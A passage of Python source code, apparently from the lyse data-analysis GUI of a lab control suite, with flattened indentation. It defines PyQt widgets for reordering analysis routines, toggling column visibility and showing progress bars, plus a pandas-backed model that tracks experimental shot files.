selected_indexes = self.ui.treeView.selectedIndexes()
selected_rows = set(index.row() for index in selected_indexes)
for row in selected_rows:
active_item = self.model.item(row, self.COL_ACTIVE)
active_item.setCheckState(active)
self.update_select_all_checkstate()
def on_move_to_top_clicked(self):
selected_indexes = self.ui.treeView.selectedIndexes()
selected_rows = set(index.row() for index in selected_indexes)
n = self.model.rowCount()
i_selected = 0
i_unselected = len(selected_rows)
order = []
for i in range(n):
if i in selected_rows:
order.append(i_selected)
i_selected += 1
else:
order.append(i_unselected)
i_unselected += 1
self.reorder(order)
def on_move_up_clicked(self):
selected_indexes = self.ui.treeView.selectedIndexes()
selected_rows = set(index.row() for index in selected_indexes)
n = self.model.rowCount()
order = []
last_unselected_index = None
for i in range(n):
if i in selected_rows:
if last_unselected_index is None:
order.append(i)
else:
order.append(i - 1)
order[last_unselected_index] += 1
else:
last_unselected_index = i
order.append(i)
self.reorder(order)
def on_move_down_clicked(self):
selected_indexes = self.ui.treeView.selectedIndexes()
selected_rows = set(index.row() for index in selected_indexes)
n = self.model.rowCount()
order = []
last_unselected_index = None
for i in reversed(range(n)):
if i in selected_rows:
if last_unselected_index is None:
order.insert(0, i)
else:
order.insert(0, i + 1)
order[last_unselected_index - n] -= 1
else:
last_unselected_index = i
order.insert(0, i)
self.reorder(order)
def on_move_to_bottom_clicked(self):
selected_indexes = self.ui.treeView.selectedIndexes()
selected_rows = set(index.row() for index in selected_indexes)
n = self.model.rowCount()
i_selected = n - len(selected_rows)
i_unselected = 0
order = []
for i in range(n):
if i in selected_rows:
order.append(i_selected)
i_selected += 1
else:
order.append(i_unselected)
i_unselected += 1
self.reorder(order)
def on_restart_selected_triggered(self):
selected_indexes = self.ui.treeView.selectedIndexes()
selected_rows = set(index.row() for index in selected_indexes)
name_items = [self.model.item(row, self.COL_NAME) for row in selected_rows]
filepaths = [item.data(self.ROLE_FULLPATH) for item in name_items]
for routine in self.routines:
if routine.filepath in filepaths:
routine.restart()
self.update_select_all_checkstate()
def analysis_loop(self):
while True:
filepath = self.from_filebox.get()
if self.multishot:
assert filepath is None
# TODO: get the filepath of the output h5 file:
# filepath = self.filechooserentry.get_text()
self.logger.info('got a file to process: %s'%filepath)
self.do_analysis(filepath)
def todo(self):
"""How many analysis routines are not done?"""
return len([r for r in self.routines if r.enabled() and not r.done])
def do_analysis(self, filepath):
"""Run all analysis routines once on the given filepath,
which is a shot file if we are a singleshot routine box"""
for routine in self.routines:
routine.set_status('clear')
remaining = self.todo()
error = False
updated_data = {}
while remaining:
self.logger.debug('%d routines left to do'%remaining)
for routine in self.routines:
if routine.enabled() and not routine.done:
break
else:
routine = None
if routine is not None:
self.logger.info('running analysis routine %s'%routine.shortname)
routine.set_status('working')
success, updated_data = routine.do_analysis(filepath)
if success:
routine.set_status('done')
self.logger.debug('success')
else:
routine.set_status('error')
self.logger.debug('failure')
error = True
break
# Race conditions here, but it's only for reporting percent done
# so it doesn't matter if it's wrong briefly:
remaining = self.todo()
total = len([r for r in self.routines if r.enabled()])
done = total - remaining
try:
status_percent = 100*float(done)/(remaining + done)
except ZeroDivisionError:
# All routines got deleted mid-analysis, we're done here:
status_percent = 100.0
self.to_filebox.put(['progress', status_percent, updated_data])
if error:
self.to_filebox.put(['error', None, updated_data])
else:
self.to_filebox.put(['done', 100.0, {}])
self.logger.debug('completed analysis of %s'%filepath)
def reorder(self, order):
assert len(order) == len(set(order)), 'ordering contains non-unique elements'
# Apply the reordering to the liststore:
for old_index, new_index in enumerate(order):
name_item = self.model.item(old_index, self.COL_NAME)
name_item.setData(new_index, self.ROLE_SORTINDEX)
self.ui.treeView.sortByColumn(self.COL_NAME, QtCore.Qt.AscendingOrder)
# Apply new order to our list of routines too:
self.routines = [self.routines[order.index(i)] for i in range(len(order))]
def update_select_all_checkstate(self):
with self.select_all_checkbox_state_changed_disconnected:
all_states = []
for row in range(self.model.rowCount()):
active_item = self.model.item(row, self.COL_ACTIVE)
all_states.append(active_item.checkState())
if all(state == QtCore.Qt.Checked for state in all_states):
self.select_all_checkbox.setCheckState(QtCore.Qt.Checked)
elif all(state == QtCore.Qt.Unchecked for state in all_states):
self.select_all_checkbox.setCheckState(QtCore.Qt.Unchecked)
else:
self.select_all_checkbox.setCheckState(QtCore.Qt.PartiallyChecked)
class EditColumnsDialog(QtWidgets.QDialog):
# A signal for when the window manager has created a new window for this widget:
newWindow = Signal(int)
close_signal = Signal()
def __init__(self):
QtWidgets.QDialog.__init__(self, None, QtCore.Qt.WindowSystemMenuHint | QtCore.Qt.WindowTitleHint)
def event(self, event):
result = QtWidgets.QDialog.event(self, event)
if event.type() == QtCore.QEvent.WinIdChange:
self.newWindow.emit(self.effectiveWinId())
return result
def closeEvent(self, event):
self.close_signal.emit()
event.ignore()
class EditColumns(object):
ROLE_SORT_DATA = QtCore.Qt.UserRole + 1
COL_VISIBLE = 0
COL_NAME = 1
def __init__(self, filebox, column_names, columns_visible):
self.filebox = filebox
self.column_names = column_names.copy()
self.columns_visible = columns_visible.copy()
self.old_columns_visible = columns_visible.copy()
loader = UiLoader()
self.ui = loader.load(os.path.join(LYSE_DIR, 'edit_columns.ui'), EditColumnsDialog())
self.model = UneditableModel()
self.header = HorizontalHeaderViewWithWidgets(self.model)
self.select_all_checkbox = QtWidgets.QCheckBox()
self.select_all_checkbox.setTristate(False)
self.ui.treeView.setHeader(self.header)
self.proxy_model = QtCore.QSortFilterProxyModel()
self.proxy_model.setSourceModel(self.model)
self.proxy_model.setFilterCaseSensitivity(QtCore.Qt.CaseInsensitive)
self.proxy_model.setFilterKeyColumn(self.COL_NAME)
self.ui.treeView.setSortingEnabled(True)
self.header.setStretchLastSection(True)
self.proxy_model.setSortRole(self.ROLE_SORT_DATA)
self.ui.treeView.setModel(self.proxy_model)
self.ui.setWindowModality(QtCore.Qt.ApplicationModal)
self.ui.treeView.setContextMenuPolicy(QtCore.Qt.CustomContextMenu)
# Make the actions for the context menu:
self.action_set_selected_visible = QtWidgets.QAction(
QtGui.QIcon(':qtutils/fugue/ui-check-box'), 'Show selected columns', self.ui)
self.action_set_selected_hidden = QtWidgets.QAction(
QtGui.QIcon(':qtutils/fugue/ui-check-box-uncheck'), 'Hide selected columns', self.ui)
self.connect_signals()
self.populate_model(column_names, self.columns_visible)
def connect_signals(self):
if os.name == 'nt':
self.ui.newWindow.connect(set_win_appusermodel)
self.ui.close_signal.connect(self.close)
self.ui.lineEdit_filter.textEdited.connect(self.on_filter_text_edited)
self.ui.pushButton_make_it_so.clicked.connect(self.make_it_so)
self.ui.pushButton_cancel.clicked.connect(self.cancel)
self.model.itemChanged.connect(self.on_model_item_changed)
# A context manager with which we can temporarily disconnect the above connection.
self.model_item_changed_disconnected = DisconnectContextManager(
self.model.itemChanged, self.on_model_item_changed)
self.select_all_checkbox.stateChanged.connect(self.on_select_all_state_changed)
self.select_all_checkbox_state_changed_disconnected = DisconnectContextManager(
self.select_all_checkbox.stateChanged, self.on_select_all_state_changed)
self.ui.treeView.customContextMenuRequested.connect(self.on_treeView_context_menu_requested)
self.action_set_selected_visible.triggered.connect(
lambda: self.on_set_selected_triggered(QtCore.Qt.Checked))
self.action_set_selected_hidden.triggered.connect(
lambda: self.on_set_selected_triggered(QtCore.Qt.Unchecked))
def populate_model(self, column_names, columns_visible):
self.model.clear()
self.model.setHorizontalHeaderLabels(['', 'Name'])
self.header.setWidget(self.COL_VISIBLE, self.select_all_checkbox)
self.ui.treeView.resizeColumnToContents(self.COL_VISIBLE)
# Which indices in self.columns_visible the row numbers correspond to
self.column_indices = {}
# Remove our special columns from the dict of column names by keeping only tuples:
column_names = {i: name for i, name in column_names.items() if isinstance(name, tuple)}
# Sort the column names as comma separated values, converting to lower case:
sortkey = lambda item: ', '.join(item[1]).lower().strip(', ')
for column_index, name in sorted(column_names.items(), key=sortkey):
visible = columns_visible[column_index]
visible_item = QtGui.QStandardItem()
visible_item.setCheckable(True)
if visible:
visible_item.setCheckState(QtCore.Qt.Checked)
visible_item.setData(QtCore.Qt.Checked, self.ROLE_SORT_DATA)
else:
visible_item.setCheckState(QtCore.Qt.Unchecked)
visible_item.setData(QtCore.Qt.Unchecked, self.ROLE_SORT_DATA)
name_as_string = ', '.join(name).strip(', ')
name_item = QtGui.QStandardItem(name_as_string)
name_item.setData(sortkey((column_index, name)), self.ROLE_SORT_DATA)
self.model.appendRow([visible_item, name_item])
self.column_indices[self.model.rowCount() - 1] = column_index
self.ui.treeView.resizeColumnToContents(self.COL_NAME)
self.update_select_all_checkstate()
self.ui.treeView.sortByColumn(self.COL_NAME, QtCore.Qt.AscendingOrder)
def on_treeView_context_menu_requested(self, point):
menu = QtWidgets.QMenu(self.ui)
menu.addAction(self.action_set_selected_visible)
menu.addAction(self.action_set_selected_hidden)
menu.exec_(QtGui.QCursor.pos())
def on_set_selected_triggered(self, visible):
selected_indexes = self.ui.treeView.selectedIndexes()
selected_rows = set(self.proxy_model.mapToSource(index).row() for index in selected_indexes)
for row in selected_rows:
visible_item = self.model.item(row, self.COL_VISIBLE)
self.update_visible_state(visible_item, visible)
self.update_select_all_checkstate()
self.do_sort()
self.filebox.set_columns_visible(self.columns_visible)
def on_filter_text_edited(self, text):
self.proxy_model.setFilterWildcard(text)
def on_select_all_state_changed(self, state):
with self.select_all_checkbox_state_changed_disconnected:
# Do not allow a switch *to* a partially checked state:
self.select_all_checkbox.setTristate(False)
state = self.select_all_checkbox.checkState()
for row in range(self.model.rowCount()):
visible_item = self.model.item(row, self.COL_VISIBLE)
self.update_visible_state(visible_item, state)
self.do_sort()
self.filebox.set_columns_visible(self.columns_visible)
def update_visible_state(self, item, state):
assert item.column() == self.COL_VISIBLE, "unexpected column"
row = item.row()
with self.model_item_changed_disconnected:
item.setCheckState(state)
item.setData(state, self.ROLE_SORT_DATA)
if state == QtCore.Qt.Checked:
self.columns_visible[self.column_indices[row]] = True
else:
self.columns_visible[self.column_indices[row]] = False
def update_select_all_checkstate(self):
with self.select_all_checkbox_state_changed_disconnected:
all_states = []
for row in range(self.model.rowCount()):
visible_item = self.model.item(row, self.COL_VISIBLE)
all_states.append(visible_item.checkState())
if all(state == QtCore.Qt.Checked for state in all_states):
self.select_all_checkbox.setCheckState(QtCore.Qt.Checked)
elif all(state == QtCore.Qt.Unchecked for state in all_states):
self.select_all_checkbox.setCheckState(QtCore.Qt.Unchecked)
else:
self.select_all_checkbox.setCheckState(QtCore.Qt.PartiallyChecked)
def on_model_item_changed(self, item):
state = item.checkState()
self.update_visible_state(item, state)
self.update_select_all_checkstate()
self.do_sort()
self.filebox.set_columns_visible(self.columns_visible)
def do_sort(self):
header = self.ui.treeView.header()
sort_column = header.sortIndicatorSection()
sort_order = header.sortIndicatorOrder()
self.ui.treeView.sortByColumn(sort_column, sort_order)
def update_columns(self, column_names, columns_visible):
# Index/name mapping may have changed. Get a mapping by *name* of
# which columns were previously visible, so we can update our by-index
# mapping in a moment:
old_columns_visible_by_name = {}
for old_column_number, visible in self.old_columns_visible.items():
column_name = self.column_names[old_column_number]
old_columns_visible_by_name[column_name] = visible
self.columns_visible = columns_visible.copy()
self.column_names = column_names.copy()
# Update the by-index mapping of which columns were visible before editing:
self.old_columns_visible = {}
for index, name in self.column_names.items():
try:
self.old_columns_visible[index] = old_columns_visible_by_name[name]
except KeyError:
# A new column. If editing is cancelled, any new columns
# should be set to visible:
self.old_columns_visible[index] = True
self.populate_model(column_names, self.columns_visible)
def show(self):
self.old_columns_visible = self.columns_visible.copy()
self.ui.show()
def close(self):
self.columns_visible = self.old_columns_visible.copy()
self.filebox.set_columns_visible(self.columns_visible)
self.populate_model(self.column_names, self.columns_visible)
self.ui.hide()
def cancel(self):
self.ui.close()
def make_it_so(self):
self.ui.hide()
class ItemDelegate(QtWidgets.QStyledItemDelegate):
"""An item delegate with a fixed height and a progress bar in one column"""
EXTRA_ROW_HEIGHT = 2
def __init__(self, view, model, col_status, role_status_percent):
self.view = view
self.model = model
self.COL_STATUS = col_status
self.ROLE_STATUS_PERCENT = role_status_percent
QtWidgets.QStyledItemDelegate.__init__(self)
def sizeHint(self, *args):
fontmetrics = QtGui.QFontMetrics(self.view.font())
text_height = fontmetrics.height()
row_height = text_height + self.EXTRA_ROW_HEIGHT
size = QtWidgets.QStyledItemDelegate.sizeHint(self, *args)
return QtCore.QSize(size.width(), row_height)
def paint(self, painter, option, index):
if index.column() == self.COL_STATUS:
status_percent = self.model.data(index, self.ROLE_STATUS_PERCENT)
if status_percent == 100:
# Render as a normal item - this shows whatever icon is set instead of a progress bar.
return QtWidgets.QStyledItemDelegate.paint(self, painter, option, index)
else:
# Method of rendering a progress bar into the view copied from
# Qt's 'network-torrent' example:
# http://qt-project.org/doc/qt-4.8/network-torrent-torrentclient-cpp.html
# Set up a QStyleOptionProgressBar to precisely mimic the
# environment of a progress bar.
progress_bar_option = QtWidgets.QStyleOptionProgressBar()
progress_bar_option.state = QtWidgets.QStyle.State_Enabled
progress_bar_option.direction = qapplication.layoutDirection()
progress_bar_option.rect = option.rect
progress_bar_option.fontMetrics = qapplication.fontMetrics()
progress_bar_option.minimum = 0
progress_bar_option.maximum = 100
progress_bar_option.textAlignment = QtCore.Qt.AlignCenter
progress_bar_option.textVisible = True
# Set the progress and text values of the style option.
progress_bar_option.progress = status_percent
progress_bar_option.text = '%d%%' % status_percent
# Draw the progress bar onto the view.
qapplication.style().drawControl(QtWidgets.QStyle.CE_ProgressBar, progress_bar_option, painter)
else:
return QtWidgets.QStyledItemDelegate.paint(self, painter, option, index)
class UneditableModel(QtGui.QStandardItemModel):
def flags(self, index):
"""Return flags as normal except that the ItemIsEditable
flag is always False"""
result = QtGui.QStandardItemModel.flags(self, index)
return result & ~QtCore.Qt.ItemIsEditable
class TableView(QtWidgets.QTableView):
leftClicked = Signal(QtCore.QModelIndex)
doubleLeftClicked = Signal(QtCore.QModelIndex)
"""A QTableView that emits a custom signal leftClicked(index) after a left
click on a valid index, and doubleLeftClicked(index) (in addition) on
double click. Multiple inheritance of QObjects is not possible, so we
are forced to duplicate code instead of sharing code with the extremely
similar TreeView class in this module"""
def __init__(self, *args):
QtWidgets.QTableView.__init__(self, *args)
self._pressed_index = None
self._double_click = False
def mousePressEvent(self, event):
result = QtWidgets.QTableView.mousePressEvent(self, event)
index = self.indexAt(event.pos())
if event.button() == QtCore.Qt.LeftButton and index.isValid():
self._pressed_index = self.indexAt(event.pos())
return result
def leaveEvent(self, event):
result = QtWidgets.QTableView.leaveEvent(self, event)
self._pressed_index = None
self._double_click = False
return result
def mouseDoubleClickEvent(self, event):
# Ensure our left click event occurs regardless of whether it is the
# second click in a double click or not
result = QtWidgets.QTableView.mouseDoubleClickEvent(self, event)
index = self.indexAt(event.pos())
if event.button() == QtCore.Qt.LeftButton and index.isValid():
self._pressed_index = self.indexAt(event.pos())
self._double_click = True
return result
def mouseReleaseEvent(self, event):
result = QtWidgets.QTableView.mouseReleaseEvent(self, event)
index = self.indexAt(event.pos())
if event.button() == QtCore.Qt.LeftButton and index.isValid() and index == self._pressed_index:
self.leftClicked.emit(index)
if self._double_click:
self.doubleLeftClicked.emit(index)
self._pressed_index = None
self._double_click = False
return result
class DataFrameModel(QtCore.QObject):
COL_STATUS = 0
COL_FILEPATH = 1
ROLE_STATUS_PERCENT = QtCore.Qt.UserRole + 1
ROLE_DELETED_OFF_DISK = QtCore.Qt.UserRole + 2
columns_changed = Signal()
def __init__(self, view, exp_config):
QtCore.QObject.__init__(self)
self._view = view
self.exp_config = exp_config
self._model = UneditableModel()
self.row_number_by_filepath = {}
self._previous_n_digits = 0
self._header = HorizontalHeaderViewWithWidgets(self._model)
self._vertheader = QtWidgets.QHeaderView(QtCore.Qt.Vertical)
self._vertheader.setSectionResizeMode(QtWidgets.QHeaderView.Fixed)
# Smaller font for headers:
font = self._vertheader.font()
font.setPointSize(10 if sys.platform == 'darwin' else 8)
self._header.setFont(font)
font.setFamily('Ubuntu Mono')
self._vertheader.setFont(font)
self._vertheader.setHighlightSections(True)
self._vertheader.setSectionsClickable(True)
self._view.setModel(self._model)
self._view.setHorizontalHeader(self._header)
self._view.setVerticalHeader(self._vertheader)
self._delegate = ItemDelegate(self._view, self._model, self.COL_STATUS, self.ROLE_STATUS_PERCENT)
self._view.setItemDelegate(self._delegate)
self._view.setSelectionBehavior(QtWidgets.QTableView.SelectRows)
self._view.setContextMenuPolicy(QtCore.Qt.CustomContextMenu)
# Check if integer indexing is to be used
try:
self.integer_indexing = self.exp_config.getboolean('lyse', 'integer_indexing')
except (LabConfig.NoOptionError, LabConfig.NoSectionError):
self.integer_indexing = False
# This dataframe will contain all the scalar data
# from the shot files that are currently open:
index = pandas.MultiIndex.from_tuples([('filepath', '')])
self.dataframe = pandas.DataFrame({'filepath': []}, columns=index)
# How many levels the dataframe's multiindex has:
self.nlevels = self.dataframe.columns.nlevels
status_item = QtGui.QStandardItem()
status_item.setIcon(QtGui.QIcon(':qtutils/fugue/information'))
status_item.setToolTip('status/progress of single-shot analysis')
self._model.setHorizontalHeaderItem(self.COL_STATUS, status_item)
filepath_item = QtGui.QStandardItem('filepath')
filepath_item.setToolTip('filepath')
self._model.setHorizontalHeaderItem(self.COL_FILEPATH, filepath_item)
self._view.setColumnWidth(self.COL_STATUS, 70)
self._view.setColumnWidth(self.COL_FILEPATH, 100)
# Column indices to names and vice versa for fast lookup:
self.column_indices = {'__status': self.COL_STATUS, ('filepath', ''): self.COL_FILEPATH}
self.column_names = {self.COL_STATUS: '__status', self.COL_FILEPATH: ('filepath', '')}
self.columns_visible = {self.COL_STATUS: True, self.COL_FILEPATH: True}
# Whether or not a deleted column was visible at the time it was deleted (by name):
self.deleted_columns_visible = {}
# Make the actions for the context menu:
self.action_remove_selected = QtWidgets.QAction(
QtGui.QIcon(':qtutils/fugue/minus'), 'Remove selected shots', self._view)
self.connect_signals()
def connect_signals(self):
self._view.customContextMenuRequested.connect(self.on_view_context_menu_requested)
self.action_remove_selected.triggered.connect(self.on_remove_selection)
def on_remove_selection(self):
self.remove_selection()
def remove_selection(self, confirm=True):
selection_model = self._view.selectionModel()
selected_indexes = selection_model.selectedRows()
selected_name_items = [self._model.itemFromIndex(index) for index in selected_indexes]
if not selected_name_items:
return
if confirm and not question_dialog("Remove %d shots?" % len(selected_name_items)):
return
# Remove from DataFrame first:
self.dataframe = self.dataframe.drop(index.row() for index in selected_indexes)
self.dataframe.index = pandas.Index(range(len(self.dataframe)))
# Delete one at a time from Qt model:
for name_item in selected_name_items:
row = name_item.row()
self._model.removeRow(row)
self.renumber_rows()
def mark_selection_not_done(self):
selected_indexes = self._view.selectedIndexes()
selected_rows = set(index.row() for index in selected_indexes)
for row in selected_rows:
status_item = self._model.item(row, self.COL_STATUS)
if status_item.data(self.ROLE_DELETED_OFF_DISK):
# If the shot was previously not readable on disk, check to
# see if it's readable now. It may have been undeleted or
# perhaps it being unreadable before was due to a network
# glitch or similar.
filepath = self._model.item(row, self.COL_FILEPATH).text()
if not os.path.exists(filepath):
continue
# Shot file is accesible again:
status_item.setData(False, self.ROLE_DELETED_OFF_DISK)
status_item.setIcon(QtGui.QIcon(':qtutils/fugue/tick'))
status_item.setToolTip(None)
status_item.setData(0, self.ROLE_STATUS_PERCENT)
def on_view_context_menu_requested(self, point):
menu = QtWidgets.QMenu(self._view)
menu.addAction(self.action_remove_selected)
menu.exec_(QtGui.QCursor.pos())
def on_double_click(self, index):
filepath_item = self._model.item(index.row(), self.COL_FILEPATH)
shot_filepath = filepath_item.text()
# get path to text editor
viewer_path = self.exp_config.get('programs', 'hdf5_viewer')
viewer_args = self.exp_config.get('programs', 'hdf5_viewer_arguments')
# Get the current labscript file:
if not viewer_path:
error_dialog("No hdf5 viewer specified in the labconfig.")
if '{file}' in viewer_args:
# Split the args on spaces into a list, replacing {file} with the labscript file
viewer_args = [arg if arg != '{file}' else shot_filepath for arg in viewer_args.split()]
else:
# Otherwise if {file} isn't already in there, append it to the other args:
viewer_args = [shot_filepath] + viewer_args.split()
try:
subprocess.Popen([viewer_path] + viewer_args)
except Exception as e:
error_dialog("Unable to launch hdf5 viewer specified in %s. Error was: %s" %
(self.exp_config.config_path, str(e)))
def set_columns_visible(self, columns_visible):
self.columns_visible = columns_visible
for column_index, visible in columns_visible.items():
self._view.setColumnHidden(column_index, not visible)
def update_column_levels(self):
"""Pads the keys and values of our lists of column names so that
they still match those in the dataframe after the number of
levels in its multiindex has increased (the number of levels never
decreases, given the current implementation of concat_with_padding())"""
extra_levels = self.dataframe.columns.nlevels - self.nlevels
if extra_levels > 0:
self.nlevels = self.dataframe.columns.nlevels
column_indices = {}
column_names = {}
for column_name in self.column_indices:
if not isinstance(column_name, tuple):
# It's one of our special columns
new_column_name = column_name
else:
new_column_name = column_name + ('',) * extra_levels
column_index = self.column_indices[column_name]
column_indices[new_column_name] = column_index
column_names[column_index] = new_column_name
self.column_indices = column_indices
self.column_names = column_names
@inmain_decorator()
def mark_as_deleted_off_disk(self, filepath):
# Confirm the shot hasn't been removed from lyse (we are in the main
# thread so there is no race condition in checking first)
if not filepath in self.dataframe['filepath'].values:
# Shot has been removed from FileBox, nothing to do here:
return
row_number = self.row_number_by_filepath[filepath]
status_item = self._model.item(row_number, self.COL_STATUS)
already_marked_as_deleted = status_item.data(self.ROLE_DELETED_OFF_DISK)
if already_marked_as_deleted:
return
# Icon only displays if percent completion is 100. This is also
# important so that the shot is not picked up as analysis
# incomplete and analysis re-attempted on it.
status_item.setData(True, self.ROLE_DELETED_OFF_DISK)
status_item.setData(100, self.ROLE_STATUS_PERCENT)
status_item.setToolTip("Shot has been deleted off disk or is unreadable")
status_item.setIcon(QtGui.QIcon(':qtutils/fugue/drive--minus'))
app.output_box.output('Warning: Shot deleted from disk or no longer readable %s\n' % filepath, red=True)
@inmain_decorator()
def infer_objects(self):
"""Convert columns in the dataframe with dtype 'object' into compatible, more
specific types, if possible. This improves pickling performance and ensures
multishot analysis code does not encounter columns with dtype 'object' for
non-mixed numerical data, which it might choke on.
"""
self.dataframe = self.dataframe.infer_objects()
@inmain_decorator()
def update_row(self, filepath, dataframe_already_updated=False, status_percent=None, new_row_data=None, updated_row_data=None):
""""Updates a row in the dataframe and Qt model
to the data in the HDF5 file for that shot. Also sets the percent done, if specified"""
# To speed things up block signals to the model during update
self._model.blockSignals(True)
# Update the row in the dataframe first:
if (new_row_data is None) == (updated_row_data is None) and not dataframe_already_updated:
raise ValueError('Exactly one of new_row_data or updated_row_data must be provided')
try:
row_number = self.row_number_by_filepath[filepath]
except KeyError:
# Row has been deleted, nothing to do here:
return
filepath_colname = ('filepath',) + ('',) * (self.nlevels - 1)
assert filepath == self.dataframe.at[row_number, filepath_colname]
if updated_row_data is not None and not dataframe_already_updated:
for group, name in updated_row_data:
column_name = (group, name) + ('',) * (self.nlevels - 2)
value = updated_row_data[group, name]
try:
self.dataframe.at[row_number, column_name] = value
except ValueError:
# did the column not already exist when we tried to set an iterable?
if not column_name in self.dataframe.columns:
# create it with a non-iterable and then overwrite with the iterable value:
self.dataframe.at[row_number, column_name] = None
else:
# Incompatible datatype - convert the datatype of the column to
# 'object'
self.dataframe[column_name] = self.dataframe[column_name].astype('object')
# Now that the column exists and has dtype object, we can set the value:
self.dataframe.at[row_number, column_name] = value
dataframe_already_updated = True
if not dataframe_already_updated:
if new_row_data is None:
raise ValueError("If dataframe_already_updated is False, then new_row_data, as returned "
"by dataframe_utils.get_dataframe_from_shot(filepath) must be provided.")
self.dataframe = replace_with_padding(self.dataframe, new_row_data, row_number)
self.update_column_levels()
# Check and create necessary new columns in the Qt model:
new_column_names = set(self.dataframe.columns) - set(self.column_names.values())
new_columns_start = self._model.columnCount()
self._model.insertColumns(new_columns_start, len(new_column_names))
for i, column_name in enumerate(sorted(new_column_names)):
# Set the header label of the new column:
column_number = new_columns_start + i
self.column_names[column_number] = column_name
self.column_indices[column_name] = column_number
if column_name in self.deleted_columns_visible:
# Restore the former visibility of this column if we've
# seen one with its name before:
visible = self.deleted_columns_visible[column_name]
self.columns_visible[column_number] = visible
self._view.setColumnHidden(column_number, not visible)
else:
# new columns are visible by default:
self.columns_visible[column_number] = True
column_name_as_string = '\n'.join(column_name).strip()
header_item = QtGui.QStandardItem(column_name_as_string)
header_item.setToolTip(column_name_as_string)
self._model.setHorizontalHeaderItem(column_number, header_item)
# Check and remove any no-longer-needed columns in the Qt model:
defunct_column_names = (set(self.column_names.values()) - set(self.dataframe.columns)
- {self.column_names[self.COL_STATUS], self.column_names[self.COL_FILEPATH]})
defunct_column_indices = [self.column_indices[column_name] for column_name in defunct_column_names]
for column_number in sorted(defunct_column_indices, reverse=True):
# Remove columns from the Qt model. In reverse order so that
# removals do not change the position of columns yet to be
# removed.
self._model.removeColumn(column_number)
# Save whether or not the column was visible when it was
# removed (so that if it is re-added the visibility will be retained):
self.deleted_columns_visible[self.column_names[column_number]] = self.columns_visible[column_number]
del self.column_names[column_number]
del self.columns_visible[column_number]
if defunct_column_indices:
# Renumber the keys of self.columns_visible and self.column_names to reflect deletions:
self.column_names = {newindex: name for newindex, (oldindex, name) in enumerate(sorted(self.column_names.items()))}
self.columns_visible = {newindex: visible for newindex, (oldindex, visible) in enumerate(sorted(self.columns_visible.items()))}
# Update the inverse mapping of self.column_names:
self.column_indices = {name: index for index, name in self.column_names.items()}
# Update the data in the Qt model:
dataframe_row = self.dataframe.iloc[row_number].to_dict()
for column_number, column_name in self.column_names.items():
if not isinstance(column_name, tuple):
# One of our special columns, does not correspond to a column in the dataframe:
continue
if updated_row_data is not None and column_name not in updated_row_data:
continue
value = dataframe_row[column_name]
if isinstance(value, float):
value_str = scientific_notation(value)
else:
value_str = str(value)
lines = value_str.splitlines()
if len(lines) > 1:
short_value_str = lines[0] + ' ...'
else:
short_value_str = value_str
item = self._model.item(row_number, column_number)
if item is None:
# This is the first time we've written a value to this part of the model:
item = QtGui.QStandardItem(short_value_str)
item.setData(QtCore.Qt.AlignCenter, QtCore.Qt.TextAlignmentRole)
self._model.setItem(row_number, column_number, item)
else:
item.setText(short_value_str)
item.setToolTip(repr(value))
for i, column_name in enumerate(sorted(new_column_names)):
# Resize any new columns to fit contents:
column_number = new_columns_start + i
self._view.resizeColumnToContents(column_number)
if status_percent is not None:
status_item = self._model.item(row_number, self.COL_STATUS)
status_item.setData(status_percent, self.ROLE_STATUS_PERCENT)
if new_column_names or defunct_column_names:
self.columns_changed.emit()
# unblock signals to the model and tell it to update
self._model.blockSignals(False)
self._model.layoutChanged.emit()
def new_row(self, filepath, done=False):
status_item = QtGui.QStandardItem()
if done:
status_item.setData(100, self.ROLE_STATUS_PERCENT)
status_item.setIcon(QtGui.QIcon(':/qtutils/fugue/tick'))
else:
status_item.setData(0, self.ROLE_STATUS_PERCENT)
status_item.setIcon(QtGui.QIcon(':qtutils/fugue/tick'))
name_item = QtGui.QStandardItem(filepath)
return [status_item, name_item]
def renumber_rows(self, add_from=0):
"""Add/update row indices - the rows are numbered in simple sequential
order for easy comparison with the dataframe. add_from allows you to
only add numbers for new rows from the given index as a performance
optimisation, though if the number of digits changes, all rows will
still be renumbered. add_from should not be used if rows have been
deleted."""
n_digits = len(str(self._model.rowCount()))
if n_digits != self._previous_n_digits:
# All labels must be updated:
add_from = 0
self._previous_n_digits = n_digits
if add_from == 0:
self.row_number_by_filepath = {}
for row_number in range(add_from, self._model.rowCount()):
vertical_header_item = self._model.verticalHeaderItem(row_number)
row_number_str = str(row_number).rjust(n_digits)
vert_header_text = '{}. '.format(row_number_str)
filepath_item = self._model.item(row_number, self.COL_FILEPATH)
filepath = filepath_item.text()
self.row_number_by_filepath[filepath] = row_number
if self.integer_indexing:
header_cols = ['sequence_index', 'run number', 'run repeat']
header_strings = []
for col in header_cols:
val = self.dataframe[col].values[row_number]
if pandas.notna(val):
header_strings.append('{:04d}'.format(val))
else:
header_strings.append('----')
vert_header_text += ' | '.join(header_strings)
else:
basename = os.path.splitext(os.path.basename(filepath))[0]
vert_header_text += basename
vertical_header_item.setText(vert_header_text)
@inmain_decorator()
def add_files(self, filepaths, new_row_data, done=False):
"""Add files to the dataframe model. New_row_data should be a
dataframe containing the new rows."""
to_add = []
# Check for duplicates:
for filepath in filepaths:
if filepath in self.row_number_by_filepath or filepath in to_add:
app.output_box.output('Warning: Ignoring duplicate shot %s\n' % filepath, red=True)
if new_row_data is not None:
df_row_index = np.where(new_row_data['filepath'].values == filepath)
new_row_data = new_row_data.drop(df_row_index[0])
new_row_data.index = pandas.Index(range(len(new_row_data)))
else:
to_add.append(filepath)
assert len(new_row_data) == len(to_add)
if to_add:
# Update the dataframe:
self.dataframe = concat_with_padding(self.dataframe, new_row_data)
self.update_column_levels()
app.filebox.set_add_shots_progress(None, None, "updating filebox")
for filepath in to_add:
# Add the new rows to the Qt model:
self._model.appendRow(self.new_row(filepath, done=done))
vert_header_item = QtGui.QStandardItem('...loading...')
self._model.setVerticalHeaderItem(self._model.rowCount() - 1, vert_header_item)
self._view.resizeRowToContents(self._model.rowCount() - 1)
self.renumber_rows(add_from=self._model.rowCount()-len(to_add))
# Update the Qt model:
for filepath in to_add:
self.update_row(filepath, dataframe_already_updated=True)
@inmain_decorator()
def get_first_incomplete(self):
"""Returns the filepath of the first shot in the model that has not
been analysed"""
for row in range(self._model.rowCount()):
status_item = self._model.item(row, self.COL_STATUS)
if status_item.data(self.ROLE_STATUS_PERCENT) != 100:
filepath_item = self._model.item(row, self.COL_FILEPATH)
return filepath_item.text()
class FileBox(object):
def __init__(self, container, exp_config, to_singleshot, from_singleshot, to_multishot, from_multishot):
self.exp_config = exp_config
self.to_singleshot = to_singleshot
self.to_multishot = to_multishot
self.from_singleshot = from_singleshot
self.from_multishot = from_multishot
